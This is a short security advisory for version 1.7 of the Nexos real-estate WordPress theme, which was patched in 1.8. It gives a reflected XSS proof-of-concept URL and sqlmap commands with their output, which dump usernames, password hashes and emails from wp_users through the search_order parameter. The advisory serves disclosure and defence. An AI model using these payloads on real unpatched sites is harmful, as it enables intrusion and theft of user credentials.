Unauthenticated Reflected XSS and SQL Injection vulnerabilities were discovered in the «Nexos - Real Estate WordPress Theme», tested version — v1.7. June 17th, 2020 - Confirmed & Escalated to Envato. June 19th, 2020 - v1.8 released. Fixing the issues.
### PoC Unauthenticated Reflected XSS:
https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`XSS`)>
### PoC SQL Injection:
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" --dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]